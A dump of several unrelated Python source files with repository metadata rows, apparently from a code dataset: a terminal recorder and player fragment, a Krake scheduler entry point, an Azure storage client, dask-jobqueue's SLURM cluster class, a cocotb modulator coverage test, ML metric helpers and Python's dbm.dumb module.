except (IOError, OSError): pass
_signals(old_handlers)
waitpid(pid, 0)
class Cast:
def __init__(self, f, header): self.version, self.__file, self.v2_header, self.idle_time_limit = 2, f, header, header.get('idle_time_limit')
def events(self):
for line in self.__file: yield loads(line)
def stdout_events(self):
for time, type, data in self.events():
if type == 'o': yield [time, type, data]
def file2cast(header, f): return Cast(f, header)
class open_file():
def __init__(self, first_line, file): self.first_line, self.file = first_line, file
def __enter__(self): return file2cast(loads(self.first_line), self.file)
def __exit__(self, exc_type, exc_value, exc_traceback): self.file.close()
class file():
def __init__(self, path): self.path = path
def __enter__(self):
self.file = open(self.path, mode='rt', encoding='utf-8')
self.context = open_file(self.file.readline(), self.file)
return self.context.__enter__()
def __exit__(self, exc_type, exc_value, exc_traceback): self.context.__exit__(exc_type, exc_value, exc_traceback)
def play(cast):
try:
std = open('/dev/tty')
with raw(std.fileno()): stdin = std
except Exception: stdin = None
base_time, keyboard_interrupt, paused, pause_time, not_broke = time(), False, False, None, True
for t, _type, text in cast.stdout_events():
delay = t - (time() - base_time)
while stdin and not keyboard_interrupt and delay > 0:
if paused:
while not_broke:
fi, not_broke = stdin.fileno(), False
terminal = read(fi, 1024) if fi in select([fi], [], [], 1000)[0] else b''
if 3 in terminal: keyboard_interrupt = True
elif 32 in terminal: paused, base_time = False, base_time + (time() - pause_time)
elif 46 in terminal:
delay, pause_time = 0, time()
base_time = pause_time - t
else: not_broke = True
else:
fi = stdin.fileno()
terminal = read(fi, 1024) if fi in select([fi], [], [], delay)[0] else b''
if not terminal: break
elif 3 in terminal:
keyboard_interrupt = True
break
elif 32 in terminal:
paused, pause_time = True, time()
delay += pause_time - t - base_time
if keyboard_interrupt: break
__import__("sys").stdout.write(text)
__import__("sys").stdout.flush()
def main_rec(path, command = None):
with async_writer(path, {'width': WIDTH, 'height': HEIGHT, 'timestamp': int(time()), 'env': ENV}) as w: record(['sh', '-c', command or environ.get('SHELL') or 'sh'], w)
def main_play(path):
with file(path) as a: play(a)
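
# Hedged usage sketch (not part of the package): records a shell session to a
# cast file and replays it, using the two entry points defined above. The
# output path is a placeholder.
def _example_record_and_replay(path="demo.cast"):
    # Record an interactive shell until it exits, then play the capture back.
    main_rec(path)
    main_play(path)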
| 48.353659 | 192 | 0.607692 |
abc031ccd2eafa2cf991135736365b9631602198
| 2,083 |
py
|
Python
|
krake/krake/controller/scheduler/__main__.py
|
rak-n-rok/Krake
|
2f0d4a382b99639e2c1149ee8593a9bb589d2d3f
|
[
"Apache-2.0"
] | 1 |
2020-05-29T08:43:32.000Z
|
2020-05-29T08:43:32.000Z
|
krake/krake/controller/scheduler/__main__.py
|
rak-n-rok/Krake
|
2f0d4a382b99639e2c1149ee8593a9bb589d2d3f
|
[
"Apache-2.0"
] | null | null | null |
krake/krake/controller/scheduler/__main__.py
|
rak-n-rok/Krake
|
2f0d4a382b99639e2c1149ee8593a9bb589d2d3f
|
[
"Apache-2.0"
] | 1 |
2019-11-19T13:39:02.000Z
|
2019-11-19T13:39:02.000Z
|
"""Module for Krake controller responsible for binding Krake
applications to specific backends and entry point of Krake scheduler.
.. code:: bash
python -m krake.controller.scheduler --help
Configuration is loaded from the ``controllers.scheduler`` section:
.. code:: yaml
api_endpoint: http://localhost:8080
worker_count: 5
debounce: 1
reschedule_after: 60
stickiness: 0.1
tls:
enabled: false
client_ca: tmp/pki/ca.pem
client_cert: tmp/pki/system:gc.pem
client_key: tmp/pki/system:gc-key.pem
log:
...
"""
import logging
import pprint
from argparse import ArgumentParser
from krake import (
setup_logging,
search_config,
ConfigurationOptionMapper,
load_yaml_config,
)
from krake.data.config import SchedulerConfiguration
from krake.utils import KrakeArgumentFormatter
from ...controller import create_ssl_context, run
from .scheduler import Scheduler
logger = logging.getLogger("krake.controller.scheduler")
parser = ArgumentParser(
description="Krake scheduler", formatter_class=KrakeArgumentFormatter
)
parser.add_argument("-c", "--config", type=str, help="Path to configuration YAML file")
mapper = ConfigurationOptionMapper(SchedulerConfiguration)
mapper.add_arguments(parser)
def main(config):
setup_logging(config.log)
logger.debug("Krake Scheduler configuration settings:\n %s", pprint.pformat(config))
tls_config = config.tls
ssl_context = create_ssl_context(tls_config)
logger.debug("TLS is %s", "enabled" if ssl_context else "disabled")
scheduler = Scheduler(
api_endpoint=config.api_endpoint,
worker_count=config.worker_count,
ssl_context=ssl_context,
debounce=config.debounce,
reschedule_after=config.reschedule_after,
stickiness=config.stickiness,
)
run(scheduler)
if __name__ == "__main__":
args = vars(parser.parse_args())
config = load_yaml_config(args["config"] or search_config("scheduler.yaml"))
scheduler_config = mapper.merge(config, args)
main(scheduler_config)
| 25.716049 | 88 | 0.731637 |
b45e8402c4e18141dc25b2110203e7593a2d182c
| 6,021 |
py
|
Python
|
azure-mgmt-storage/azure/mgmt/storage/storage_management_client.py
|
Berryliao84/Python-Azure
|
a96ed6e8bbf4290372980a2919b31110da90b164
|
[
"MIT"
] | 1 |
2017-10-29T15:14:35.000Z
|
2017-10-29T15:14:35.000Z
|
azure-mgmt-storage/azure/mgmt/storage/storage_management_client.py
|
Berryliao84/Python-Azure
|
a96ed6e8bbf4290372980a2919b31110da90b164
|
[
"MIT"
] | null | null | null |
azure-mgmt-storage/azure/mgmt/storage/storage_management_client.py
|
Berryliao84/Python-Azure
|
a96ed6e8bbf4290372980a2919b31110da90b164
|
[
"MIT"
] | null | null | null |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.service_client import ServiceClient
from msrest import Serializer, Deserializer
from msrestazure import AzureConfiguration
from .version import VERSION
from .operations.storage_accounts_operations import StorageAccountsOperations
from .operations.usage_operations import UsageOperations
from . import models
class StorageManagementClientConfiguration(AzureConfiguration):
"""Configuration for StorageManagementClient
Note that all parameters used to create this instance are saved as instance
attributes.
:param credentials: Credentials needed for the client to connect to Azure.
:type credentials: :mod:`A msrestazure Credentials
object<msrestazure.azure_active_directory>`
:param subscription_id: Gets subscription credentials which uniquely
identify the Microsoft Azure subscription. The subscription ID forms part
of the URI for every service call.
:type subscription_id: str
:param api_version: Client Api Version.
:type api_version: str
:param accept_language: Gets or sets the preferred language for the
response.
:type accept_language: str
:param long_running_operation_retry_timeout: Gets or sets the retry
timeout in seconds for Long Running Operations. Default value is 30.
:type long_running_operation_retry_timeout: int
:param generate_client_request_id: When set to true a unique
x-ms-client-request-id value is generated and included in each request.
Default is true.
:type generate_client_request_id: bool
:param str base_url: Service URL
:param str filepath: Existing config
"""
def __init__(
self, credentials, subscription_id, api_version='2016-01-01', accept_language='en-US', long_running_operation_retry_timeout=30, generate_client_request_id=True, base_url=None, filepath=None):
if credentials is None:
raise ValueError("Parameter 'credentials' must not be None.")
if subscription_id is None:
raise ValueError("Parameter 'subscription_id' must not be None.")
if not isinstance(subscription_id, str):
raise TypeError("Parameter 'subscription_id' must be str.")
if api_version is not None and not isinstance(api_version, str):
raise TypeError("Optional parameter 'api_version' must be str.")
if accept_language is not None and not isinstance(accept_language, str):
raise TypeError("Optional parameter 'accept_language' must be str.")
if not base_url:
base_url = 'https://management.azure.com'
super(StorageManagementClientConfiguration, self).__init__(base_url, filepath)
self.add_user_agent('storagemanagementclient/{}'.format(VERSION))
self.add_user_agent('Azure-SDK-For-Python')
self.credentials = credentials
self.subscription_id = subscription_id
self.api_version = api_version
self.accept_language = accept_language
self.long_running_operation_retry_timeout = long_running_operation_retry_timeout
self.generate_client_request_id = generate_client_request_id
class StorageManagementClient(object):
"""The Storage Management Client.
:ivar config: Configuration for client.
:vartype config: StorageManagementClientConfiguration
:ivar storage_accounts: StorageAccounts operations
:vartype storage_accounts: .operations.StorageAccountsOperations
:ivar usage: Usage operations
:vartype usage: .operations.UsageOperations
:param credentials: Credentials needed for the client to connect to Azure.
:type credentials: :mod:`A msrestazure Credentials
object<msrestazure.azure_active_directory>`
:param subscription_id: Gets subscription credentials which uniquely
identify the Microsoft Azure subscription. The subscription ID forms part
of the URI for every service call.
:type subscription_id: str
:param api_version: Client Api Version.
:type api_version: str
:param accept_language: Gets or sets the preferred language for the
response.
:type accept_language: str
:param long_running_operation_retry_timeout: Gets or sets the retry
timeout in seconds for Long Running Operations. Default value is 30.
:type long_running_operation_retry_timeout: int
:param generate_client_request_id: When set to true a unique
x-ms-client-request-id value is generated and included in each request.
Default is true.
:type generate_client_request_id: bool
:param str base_url: Service URL
:param str filepath: Existing config
"""
def __init__(
self, credentials, subscription_id, api_version='2016-01-01', accept_language='en-US', long_running_operation_retry_timeout=30, generate_client_request_id=True, base_url=None, filepath=None):
self.config = StorageManagementClientConfiguration(credentials, subscription_id, api_version, accept_language, long_running_operation_retry_timeout, generate_client_request_id, base_url, filepath)
self._client = ServiceClient(self.config.credentials, self.config)
client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
self._serialize = Serializer(client_models)
self._deserialize = Deserializer(client_models)
self.storage_accounts = StorageAccountsOperations(
self._client, self.config, self._serialize, self._deserialize)
self.usage = UsageOperations(
self._client, self.config, self._serialize, self._deserialize)
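
# Hedged usage sketch (not part of the generated client): constructing the
# client and listing storage accounts. The service principal values and
# subscription id are placeholders, and the azure.common credentials class is
# an assumption about how this SDK generation is typically authenticated.
def _example_list_storage_accounts():
    from azure.common.credentials import ServicePrincipalCredentials

    credentials = ServicePrincipalCredentials(
        client_id="<client-id>",
        secret="<client-secret>",
        tenant="<tenant-id>",
    )
    client = StorageManagementClient(credentials, "<subscription-id>")

    # storage_accounts.list() returns a paged iterable of StorageAccount models
    for account in client.storage_accounts.list():
        print(account.name, account.location)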
| 47.785714 | 204 | 0.733599 |
5942c34071dcb91ebe968c06a082520f09fab9f9
| 4,823 |
py
|
Python
|
dask_jobqueue/slurm.py
|
jennirinker/dask-jobqueue
|
975425e2968873310bec030a761c1db99e6c7ec6
|
[
"BSD-3-Clause"
] | null | null | null |
dask_jobqueue/slurm.py
|
jennirinker/dask-jobqueue
|
975425e2968873310bec030a761c1db99e6c7ec6
|
[
"BSD-3-Clause"
] | null | null | null |
dask_jobqueue/slurm.py
|
jennirinker/dask-jobqueue
|
975425e2968873310bec030a761c1db99e6c7ec6
|
[
"BSD-3-Clause"
] | null | null | null |
import logging
import math
import dask
from .core import JobQueueCluster, docstrings
logger = logging.getLogger(__name__)
class SLURMCluster(JobQueueCluster):
__doc__ = docstrings.with_indents(
""" Launch Dask on a SLURM cluster
Parameters
----------
queue : str
Destination queue for each worker job. Passed to `#SBATCH -p` option.
project : str
Accounting string associated with each worker job. Passed to `#SBATCH -A` option.
walltime : str
Walltime for each worker job.
job_cpu : int
Number of cpu to book in SLURM, if None, defaults to worker `threads * processes`
job_mem : str
Amount of memory to request in SLURM. If None, defaults to worker
processes * memory
job_extra : list
        List of other Slurm options, for example ['--exclusive']. Each option will be prepended with the #SBATCH prefix.
%(JobQueueCluster.parameters)s
Examples
--------
>>> from dask_jobqueue import SLURMCluster
>>> cluster = SLURMCluster(processes=6, cores=24, memory="120GB",
env_extra=['export LANG="en_US.utf8"',
'export LANGUAGE="en_US.utf8"',
'export LC_ALL="en_US.utf8"'])
>>> cluster.scale(10) # this may take a few seconds to launch
>>> from dask.distributed import Client
>>> client = Client(cluster)
This also works with adaptive clusters. This automatically launches and kill workers based on load.
>>> cluster.adapt()
""",
4,
)
# Override class variables
submit_command = "sbatch"
cancel_command = "scancel"
def __init__(
self,
queue=None,
project=None,
walltime=None,
job_cpu=None,
job_mem=None,
job_extra=None,
config_name="slurm",
**kwargs
):
if queue is None:
queue = dask.config.get("jobqueue.%s.queue" % config_name)
if project is None:
project = dask.config.get("jobqueue.%s.project" % config_name)
if walltime is None:
walltime = dask.config.get("jobqueue.%s.walltime" % config_name)
if job_cpu is None:
job_cpu = dask.config.get("jobqueue.%s.job-cpu" % config_name)
if job_mem is None:
job_mem = dask.config.get("jobqueue.%s.job-mem" % config_name)
if job_extra is None:
job_extra = dask.config.get("jobqueue.%s.job-extra" % config_name)
super().__init__(config_name=config_name, **kwargs)
# Always ask for only one task
header_lines = []
# SLURM header build
if self.name is not None:
header_lines.append("#SBATCH -J %s" % self.name)
if self.log_directory is not None:
header_lines.append(
"#SBATCH -e %s/%s-%%J.err" % (self.log_directory, self.name or "worker")
)
header_lines.append(
"#SBATCH -o %s/%s-%%J.out" % (self.log_directory, self.name or "worker")
)
if queue is not None:
header_lines.append("#SBATCH -p %s" % queue)
if project is not None:
header_lines.append("#SBATCH -A %s" % project)
# Init resources, always 1 task,
# and then number of cpu is processes * threads if not set
header_lines.append("#SBATCH -n 1")
header_lines.append(
"#SBATCH --cpus-per-task=%d" % (job_cpu or self.worker_cores)
)
# Memory
memory = job_mem
if job_mem is None:
memory = slurm_format_bytes_ceil(self.worker_memory)
if memory is not None:
header_lines.append("#SBATCH --mem=%s" % memory)
if walltime is not None:
header_lines.append("#SBATCH -t %s" % walltime)
header_lines.extend(["#SBATCH %s" % arg for arg in job_extra])
header_lines.append("JOB_ID=${SLURM_JOB_ID%;*}")
# Declare class attribute that shall be overridden
self.job_header = "\n".join(header_lines)
logger.debug("Job script: \n %s" % self.job_script())
def slurm_format_bytes_ceil(n):
""" Format bytes as text.
    SLURM expects KiB, MiB or GiB, but names it KB, MB, GB. SLURM does not handle Bytes, only starts at KB.
>>> slurm_format_bytes_ceil(1)
'1K'
>>> slurm_format_bytes_ceil(1234)
'2K'
>>> slurm_format_bytes_ceil(12345678)
'13M'
>>> slurm_format_bytes_ceil(1234567890)
'2G'
>>> slurm_format_bytes_ceil(15000000000)
'14G'
"""
if n >= (1024 ** 3):
return "%dG" % math.ceil(n / (1024 ** 3))
if n >= (1024 ** 2):
return "%dM" % math.ceil(n / (1024 ** 2))
if n >= 1024:
return "%dK" % math.ceil(n / 1024)
return "1K" % n
| 33.034247 | 110 | 0.587394 |
b3833ae014e13b485aa7a5013a7d09ed4d273567
| 303 |
py
|
Python
|
data/multilingual/Latn.QVA/Mono_12/pdf_to_json_test_Latn.QVA_Mono_12.py
|
antoinecarme/pdf_to_json_tests
|
d57a024fde862e698d916a1178f285883d7a3b2f
|
[
"BSD-3-Clause"
] | 1 |
2021-09-19T19:47:35.000Z
|
2021-09-19T19:47:35.000Z
|
data/multilingual/Latn.QVA/Mono_12/pdf_to_json_test_Latn.QVA_Mono_12.py
|
antoinecarme/pdf_to_json_tests
|
d57a024fde862e698d916a1178f285883d7a3b2f
|
[
"BSD-3-Clause"
] | null | null | null |
data/multilingual/Latn.QVA/Mono_12/pdf_to_json_test_Latn.QVA_Mono_12.py
|
antoinecarme/pdf_to_json_tests
|
d57a024fde862e698d916a1178f285883d7a3b2f
|
[
"BSD-3-Clause"
] | null | null | null |
import pdf_to_json as p2j
import json
url = "file:data/multilingual/Latn.QVA/Mono_12/udhr_Latn.QVA_Mono_12.pdf"
lConverter = p2j.pdf_to_json.pdf_to_json_converter()
lConverter.mImageHashOnly = True
lDict = lConverter.convert(url)
print(json.dumps(lDict, indent=4, ensure_ascii=False, sort_keys=True))
| 30.3 | 73 | 0.811881 |
a8be862da4960f10719473d21eb7fdd4528174eb
| 1,667 |
py
|
Python
|
xschem/fractional_n_divider/tests/mash_mod/test_mash_mod_coverage.py
|
yrrapt/caravel_amsat_txrx_ic
|
53bef4537447a623f93772092daeac67c4cb3d45
|
[
"Apache-2.0"
] | 15 |
2020-12-13T12:33:15.000Z
|
2022-02-17T18:09:25.000Z
|
xschem/fractional_n_divider/tests/mash_mod/test_mash_mod_coverage.py
|
yrrapt/caravel_amsat_txrx_ic
|
53bef4537447a623f93772092daeac67c4cb3d45
|
[
"Apache-2.0"
] | null | null | null |
xschem/fractional_n_divider/tests/mash_mod/test_mash_mod_coverage.py
|
yrrapt/caravel_amsat_txrx_ic
|
53bef4537447a623f93772092daeac67c4cb3d45
|
[
"Apache-2.0"
] | 6 |
2021-01-02T05:52:21.000Z
|
2022-03-28T06:55:07.000Z
|
import cocotb
from cocotb.triggers import RisingEdge, ReadOnly
from cocotb_coverage.coverage import *
# auxiliary relation function to define bins matching within a range
range_relation = lambda val_, bin_ : bin_[0] <= val_ <= bin_[1]
class MASHModStatus():
"""
Object representing modulator status
"""
def __init__(self, dut):
self.dut = dut
# @cocotb.coroutine
def update(self):
self.data_in = int(self.dut.data_in.value)
self.data_out = int(self.dut.data_out)
# functional coverage - check that the modulator input and output values
# have each been exercised across the low, med and high bins defined below
MASHModCoverage = coverage_section (
CoverPoint(
name = "top.data_in",
xf = lambda dut, status, input_data : status.data_in,
rel = range_relation,
bins = [(0,int(2**16*1/3)-1), (int(2**16*1/3),int(2**16*2/3)-1), (int(2**16*2/3),int(2**16-1))],
bins_labels = ["low", "med", "high"]
),
CoverPoint(
name = "top.data_out",
xf = lambda dut, status, input_data : status.data_out,
rel = range_relation,
bins = [(0,int(2**3*1/3)-1), (int(2**3*1/3),int(2**3*2/3)-1), (int(2**3*2/3),int(2**3-1))],
bins_labels = ["low", "med", "high"]
)
)
# procedure of processing data
# coverage sampled here - at each function call
@MASHModCoverage
async def process_data(dut, status, input_data):
# provide new data and read old
dut.data_in <= input_data
await RisingEdge(dut.clk)
output_data = int(dut.data_out)
# convert to signed
if output_data > 2**2:
output_data -= 2**3
return output_data
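
# Hedged illustration (not part of the testbench): shows how the bin
# definitions above classify a value using the same range_relation helper.
# The bins mirror the "top.data_in" cover point; the sample value is arbitrary.
def _example_classify_data_in(value=40000):
    bins = [(0, int(2**16 * 1 / 3) - 1),
            (int(2**16 * 1 / 3), int(2**16 * 2 / 3) - 1),
            (int(2**16 * 2 / 3), int(2**16 - 1))]
    labels = ["low", "med", "high"]
    for label, bin_ in zip(labels, bins):
        if range_relation(value, bin_):
            return label
    return None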
| 30.309091 | 104 | 0.632274 |
784e349e12c5770fb9d646442a576e5e8958cbbe
| 2,272 |
py
|
Python
|
mltb/metrics.py
|
ddxgz/mltb
|
a265bf4b72cd3c51b34c2a0603bd9d0def6f86db
|
[
"MIT"
] | 2 |
2020-08-07T13:56:48.000Z
|
2020-09-20T11:24:06.000Z
|
mltb/metrics.py
|
ddxgz/mltoolbox
|
a265bf4b72cd3c51b34c2a0603bd9d0def6f86db
|
[
"MIT"
] | null | null | null |
mltb/metrics.py
|
ddxgz/mltoolbox
|
a265bf4b72cd3c51b34c2a0603bd9d0def6f86db
|
[
"MIT"
] | 1 |
2020-11-07T14:04:06.000Z
|
2020-11-07T14:04:06.000Z
|
import numpy as np
import pandas as pd
from sklearn import metrics
from typing import List
def rmse_cal(y_true, y_pred, log: bool=False, negate=False):
if log:
# to add 1 in case the predicted values are not positive
y_true = np.log1p(y_true)
y_pred = np.log1p(y_pred)
# return -np.sqrt(mean_squared_error(y_true, y_pred))
if negate:
return -np.sqrt(np.sum(np.square(y_pred - y_true)) / len(y_pred))
return np.sqrt(np.sum(np.square(y_pred - y_true)) / len(y_pred))
# if the custom score function is a loss (greater_is_better=False), the output
# of the python function is negated by the scorer object, conforming to the
# cross validation convention that scorers return higher values for better
# models.
# rmsle_cal = partial(rmse_cal, True)
RMSE = metrics.make_scorer(rmse_cal, log=False, greater_is_better=False)
RMSLE = metrics.make_scorer(rmse_cal, log=True, greater_is_better=False)
def classification_report_avg(y_true, y_pred, cols_avg: List[str] = None):
if isinstance(y_true, list):
y_true = np.array(y_true)
if isinstance(y_pred, list):
y_pred = np.array(y_pred)
report = metrics.classification_report(
y_true, y_pred, output_dict=True, zero_division=0)
df_report = pd.DataFrame(report).transpose()
if cols_avg is not None:
cols = cols_avg
else:
cols = ['micro avg', 'macro avg', 'weighted avg', 'samples avg']
return df_report.loc[cols, ]
def best_fbeta_score(true_labels, predictions, beta=1, average='micro', **kwargs):
fbeta = 0
thr_bst = 0
for thr in range(0, 6):
Y_predicted = (predictions > (thr * 0.1))
f = metrics.fbeta_score(
true_labels, Y_predicted, beta=beta, average=average, **kwargs)
if f > fbeta:
fbeta = f
thr_bst = thr * 0.1
    return fbeta, thr_bst
def best_prec_score(true_labels, predictions, average='micro', **kwargs):
fbeta = 0
thr_bst = 0
for thr in range(0, 6):
Y_predicted = (predictions > (thr * 0.1))
f = metrics.average_precision_score(
            true_labels, Y_predicted, average=average, **kwargs)
if f > fbeta:
fbeta = f
thr_bst = thr * 0.1
    return fbeta, thr_bst
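
# Hedged usage sketch (not part of the module): the RMSE scorer defined above
# plugged into scikit-learn cross-validation. Because the scorer is built with
# greater_is_better=False, the reported scores are negated RMSE values. The toy
# data and estimator are placeholders.
def _example_cross_val_rmse():
    from sklearn.linear_model import LinearRegression
    from sklearn.model_selection import cross_val_score

    X = np.arange(20, dtype=float).reshape(-1, 1)
    y = 3.0 * X.ravel() + 1.0

    scores = cross_val_score(LinearRegression(), X, y, scoring=RMSE, cv=3)
    return scores  # negative values; closer to zero is better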
| 31.123288 | 82 | 0.65669 |
2296dbfd547eb76ecf38f6189c1549fc112e87d1
| 11,989 |
py
|
Python
|
contrib/tools/python3/src/Lib/dbm/dumb.py
|
HeyLey/catboost
|
f472aed90604ebe727537d9d4a37147985e10ec2
|
[
"Apache-2.0"
] | 36 |
2019-06-07T20:44:06.000Z
|
2022-03-23T06:19:43.000Z
|
contrib/tools/python3/src/Lib/dbm/dumb.py
|
HeyLey/catboost
|
f472aed90604ebe727537d9d4a37147985e10ec2
|
[
"Apache-2.0"
] | 42 |
2018-05-25T15:57:08.000Z
|
2021-01-17T18:39:59.000Z
|
contrib/tools/python3/src/Lib/dbm/dumb.py
|
HeyLey/catboost
|
f472aed90604ebe727537d9d4a37147985e10ec2
|
[
"Apache-2.0"
] | 28 |
2019-06-27T04:11:27.000Z
|
2022-03-11T06:27:44.000Z
|
"""A dumb and slow but simple dbm clone.
For database spam, spam.dir contains the index (a text file),
spam.bak *may* contain a backup of the index (also a text file),
while spam.dat contains the data (a binary file).
XXX TO DO:
- seems to contain a bug when updating...
- reclaim free space (currently, space once occupied by deleted or expanded
items is never reused)
- support concurrent access (currently, if two processes take turns making
updates, they can mess up the index)
- support efficient access to large databases (currently, the whole index
is read when the database is opened, and some updates rewrite the whole index)
- support opening for read-only (flag = 'm')
"""
import ast as _ast
import io as _io
import os as _os
import collections
__all__ = ["error", "open"]
_BLOCKSIZE = 512
error = OSError
class _Database(collections.MutableMapping):
# The on-disk directory and data files can remain in mutually
# inconsistent states for an arbitrarily long time (see comments
# at the end of __setitem__). This is only repaired when _commit()
# gets called. One place _commit() gets called is from __del__(),
# and if that occurs at program shutdown time, module globals may
# already have gotten rebound to None. Since it's crucial that
# _commit() finish successfully, we can't ignore shutdown races
# here, and _commit() must not reference any globals.
_os = _os # for _commit()
_io = _io # for _commit()
def __init__(self, filebasename, mode, flag='c'):
self._mode = mode
self._readonly = (flag == 'r')
# The directory file is a text file. Each line looks like
# "%r, (%d, %d)\n" % (key, pos, siz)
# where key is the string key, pos is the offset into the dat
# file of the associated value's first byte, and siz is the number
# of bytes in the associated value.
self._dirfile = filebasename + '.dir'
# The data file is a binary file pointed into by the directory
# file, and holds the values associated with keys. Each value
# begins at a _BLOCKSIZE-aligned byte offset, and is a raw
# binary 8-bit string value.
self._datfile = filebasename + '.dat'
self._bakfile = filebasename + '.bak'
# The index is an in-memory dict, mirroring the directory file.
self._index = None # maps keys to (pos, siz) pairs
# Handle the creation
self._create(flag)
self._update()
def _create(self, flag):
if flag == 'n':
for filename in (self._datfile, self._bakfile, self._dirfile):
try:
_os.remove(filename)
except OSError:
pass
# Mod by Jack: create data file if needed
try:
f = _io.open(self._datfile, 'r', encoding="Latin-1")
except OSError:
if flag not in ('c', 'n'):
import warnings
warnings.warn("The database file is missing, the "
"semantics of the 'c' flag will be used.",
DeprecationWarning, stacklevel=4)
with _io.open(self._datfile, 'w', encoding="Latin-1") as f:
self._chmod(self._datfile)
else:
f.close()
# Read directory file into the in-memory index dict.
def _update(self):
self._index = {}
try:
f = _io.open(self._dirfile, 'r', encoding="Latin-1")
except OSError:
self._modified = not self._readonly
else:
self._modified = False
with f:
for line in f:
line = line.rstrip()
key, pos_and_siz_pair = _ast.literal_eval(line)
key = key.encode('Latin-1')
self._index[key] = pos_and_siz_pair
# Write the index dict to the directory file. The original directory
# file (if any) is renamed with a .bak extension first. If a .bak
# file currently exists, it's deleted.
def _commit(self):
# CAUTION: It's vital that _commit() succeed, and _commit() can
# be called from __del__(). Therefore we must never reference a
# global in this routine.
if self._index is None or not self._modified:
return # nothing to do
try:
self._os.unlink(self._bakfile)
except OSError:
pass
try:
self._os.rename(self._dirfile, self._bakfile)
except OSError:
pass
with self._io.open(self._dirfile, 'w', encoding="Latin-1") as f:
self._chmod(self._dirfile)
for key, pos_and_siz_pair in self._index.items():
# Use Latin-1 since it has no qualms with any value in any
# position; UTF-8, though, does care sometimes.
entry = "%r, %r\n" % (key.decode('Latin-1'), pos_and_siz_pair)
f.write(entry)
sync = _commit
def _verify_open(self):
if self._index is None:
raise error('DBM object has already been closed')
def __getitem__(self, key):
if isinstance(key, str):
key = key.encode('utf-8')
self._verify_open()
pos, siz = self._index[key] # may raise KeyError
with _io.open(self._datfile, 'rb') as f:
f.seek(pos)
dat = f.read(siz)
return dat
# Append val to the data file, starting at a _BLOCKSIZE-aligned
# offset. The data file is first padded with NUL bytes (if needed)
# to get to an aligned offset. Return pair
# (starting offset of val, len(val))
def _addval(self, val):
with _io.open(self._datfile, 'rb+') as f:
f.seek(0, 2)
pos = int(f.tell())
npos = ((pos + _BLOCKSIZE - 1) // _BLOCKSIZE) * _BLOCKSIZE
f.write(b'\0'*(npos-pos))
pos = npos
f.write(val)
return (pos, len(val))
# Write val to the data file, starting at offset pos. The caller
# is responsible for ensuring that there's enough room starting at
# pos to hold val, without overwriting some other value. Return
# pair (pos, len(val)).
def _setval(self, pos, val):
with _io.open(self._datfile, 'rb+') as f:
f.seek(pos)
f.write(val)
return (pos, len(val))
# key is a new key whose associated value starts in the data file
# at offset pos and with length siz. Add an index record to
# the in-memory index dict, and append one to the directory file.
def _addkey(self, key, pos_and_siz_pair):
self._index[key] = pos_and_siz_pair
with _io.open(self._dirfile, 'a', encoding="Latin-1") as f:
self._chmod(self._dirfile)
f.write("%r, %r\n" % (key.decode("Latin-1"), pos_and_siz_pair))
def __setitem__(self, key, val):
if self._readonly:
import warnings
warnings.warn('The database is opened for reading only',
DeprecationWarning, stacklevel=2)
if isinstance(key, str):
key = key.encode('utf-8')
elif not isinstance(key, (bytes, bytearray)):
raise TypeError("keys must be bytes or strings")
if isinstance(val, str):
val = val.encode('utf-8')
elif not isinstance(val, (bytes, bytearray)):
raise TypeError("values must be bytes or strings")
self._verify_open()
self._modified = True
if key not in self._index:
self._addkey(key, self._addval(val))
else:
# See whether the new value is small enough to fit in the
# (padded) space currently occupied by the old value.
pos, siz = self._index[key]
oldblocks = (siz + _BLOCKSIZE - 1) // _BLOCKSIZE
newblocks = (len(val) + _BLOCKSIZE - 1) // _BLOCKSIZE
if newblocks <= oldblocks:
self._index[key] = self._setval(pos, val)
else:
# The new value doesn't fit in the (padded) space used
# by the old value. The blocks used by the old value are
# forever lost.
self._index[key] = self._addval(val)
# Note that _index may be out of synch with the directory
# file now: _setval() and _addval() don't update the directory
# file. This also means that the on-disk directory and data
# files are in a mutually inconsistent state, and they'll
# remain that way until _commit() is called. Note that this
# is a disaster (for the database) if the program crashes
# (so that _commit() never gets called).
def __delitem__(self, key):
if self._readonly:
import warnings
warnings.warn('The database is opened for reading only',
DeprecationWarning, stacklevel=2)
if isinstance(key, str):
key = key.encode('utf-8')
self._verify_open()
self._modified = True
# The blocks used by the associated value are lost.
del self._index[key]
# XXX It's unclear why we do a _commit() here (the code always
# XXX has, so I'm not changing it). __setitem__ doesn't try to
# XXX keep the directory file in synch. Why should we? Or
# XXX why shouldn't __setitem__?
self._commit()
def keys(self):
try:
return list(self._index)
except TypeError:
raise error('DBM object has already been closed') from None
def items(self):
self._verify_open()
return [(key, self[key]) for key in self._index.keys()]
def __contains__(self, key):
if isinstance(key, str):
key = key.encode('utf-8')
try:
return key in self._index
except TypeError:
if self._index is None:
raise error('DBM object has already been closed') from None
else:
raise
def iterkeys(self):
try:
return iter(self._index)
except TypeError:
raise error('DBM object has already been closed') from None
__iter__ = iterkeys
def __len__(self):
try:
return len(self._index)
except TypeError:
raise error('DBM object has already been closed') from None
def close(self):
try:
self._commit()
finally:
self._index = self._datfile = self._dirfile = self._bakfile = None
__del__ = close
def _chmod(self, file):
if hasattr(self._os, 'chmod'):
self._os.chmod(file, self._mode)
def __enter__(self):
return self
def __exit__(self, *args):
self.close()
def open(file, flag='c', mode=0o666):
"""Open the database file, filename, and return corresponding object.
The flag argument, used to control how the database is opened in the
other DBM implementations, supports only the semantics of 'c' and 'n'
values. Other values will default to the semantics of 'c' value:
the database will always opened for update and will be created if it
does not exist.
The optional mode argument is the UNIX mode of the file, used only when
the database has to be created. It defaults to octal code 0o666 (and
will be modified by the prevailing umask).
"""
# Modify mode depending on the umask
try:
um = _os.umask(0)
_os.umask(um)
except AttributeError:
pass
else:
# Turn off any bits that are set in the umask
mode = mode & (~um)
if flag not in ('r', 'w', 'c', 'n'):
import warnings
warnings.warn("Flag must be one of 'r', 'w', 'c', or 'n'",
DeprecationWarning, stacklevel=2)
return _Database(file, mode, flag=flag)
| 36.889231 | 78 | 0.589957 |
7c06c302d8cf33521cdc895c1fd959b7bccd8ce7
| 1,879 |
py
|
Python
|
gestifyApi/api.py
|
canardaaydin/Hand-Gesture-Control-for-Spotify
|
7a88eac7ad60745b750346474ff34a5b67c09191
|
[
"MIT"
] | null | null | null |
gestifyApi/api.py
|
canardaaydin/Hand-Gesture-Control-for-Spotify
